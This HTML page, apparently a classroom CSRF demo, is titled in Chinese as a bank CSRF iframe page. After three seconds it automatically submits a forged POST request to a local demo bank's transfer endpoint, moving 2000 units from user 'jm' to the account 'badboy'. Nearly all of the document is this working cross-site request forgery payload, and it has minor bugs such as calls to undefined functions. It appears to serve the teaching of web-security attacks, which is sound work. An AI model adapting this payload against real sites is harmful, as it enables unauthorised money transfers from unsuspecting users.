<!DOCTYPE html>
<html lang="en">
<head>
  <meta charset="UTF-8">
  <meta name="viewport" content="width=device-width, initial-scale=1.0">
  <title>银行 csrf iframe 页面</title>
</head>
<body>
  <h1>3 秒后自动转账</h1>
  <form id="form">
    <input name="account" type="text" value="badboy"/>
    <input name="money" type="number" value="2000"/>
  </form>
  <script>
  </script>
  <script>
    const form = document.getElementById('form');
    const account = form.account;
    const money = form.money;

    // 3秒后提交表单
    setTimeout(function() {
      ajax({
        method: 'post',
        url: 'http://localhost:8080/transfer_money',
        data: JSON.stringify({
          username: 'jm',
          account: account.value.trim(),
          money: money.value.trim()
        }),
        fn: function (data) {
          const result = JSON.parse(data);

          if (result.status) {
            alert('转账成功！');
            getData();
            name.value = '';
            money.value = '';
          } else {
            alert('转账失败！原因：' + result.info);
          }
        }
      })
    }, 3000);

    /**
     * ajax
     * @param {Object} opts ajax相关参数（method、url、async、fn、headers）
     */

    function ajax (opts) {
      const xhr = new XMLHttpRequest();

      xhr.onreadystatechange = () => {
        if (xhr.readyState === 4) {
          if (xhr.status >= 200 && xhr.status < 300 || xhr.status === 304) {
            opts.fn && opts.fn(xhr.responseText, xhr);
          }
        }
      }

      xhr.open(opts.method, opts.url, opts.async || true);

      if (opts.headers && Object.prototype.toString.call(opts.headers) === '[object Object]') {
        for (let [key, value] of Object.entries(opts.headers)) {
          xhr.setRequestHeader(key, value);
        }
      }

      xhr.send(opts.data || null);

      return xhr;
    }
  </script>
</body>
</html>
